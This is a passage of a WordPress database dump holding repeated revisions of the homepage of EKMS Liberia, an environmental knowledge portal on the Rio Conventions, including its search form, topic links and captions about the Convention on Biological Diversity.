value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 00:44:09','2019-11-12 00:44:09','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1854,1,'2019-11-12 01:02:28','2019-11-12 01:02:28','','featured_cbd','','inherit','open','closed','','featured_cbd-2','','','2019-11-12 01:02:28','2019-11-12 01:02:28','',9,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg',0,'attachment','image/jpeg',0),(1855,1,'2019-11-12 01:02:38','2019-11-12 01:02:38','','featured_ccd','','inherit','open','closed','','featured_ccd','','','2019-11-12 01:02:38','2019-11-12 01:02:38','',9,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg',0,'attachment','image/jpeg',0),(1856,1,'2019-11-12 01:02:51','2019-11-12 01:02:51','','featured_fccc','','inherit','open','closed','','featured_fccc','','','2019-11-12 01:02:51','2019-11-12 01:02:51','',9,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg',0,'attachment','image/jpeg',0),(1857,1,'2019-11-12 01:07:19','2019-11-12 01:07:19','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h4>The United Nations Convention on Biological Diversity</h4></figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:07:19','2019-11-12 01:07:19','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1858,1,'2019-11-12 01:09:15','2019-11-12 01:09:15','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h4>The United Nations Convention on Biological Diversity</h4>The Convention on Biological Diversity (CBD) entered into force on 29 December 1993.</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:09:15','2019-11-12 01:09:15','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1859,1,'2019-11-12 01:12:18','2019-11-12 01:12:18','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>United Nations Convention on Biological Diversity</h6>The CBD entered into force on 29 December 1993.</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:12:18','2019-11-12 01:12:18','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1860,1,'2019-11-12 01:12:58','2019-11-12 01:12:58','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img 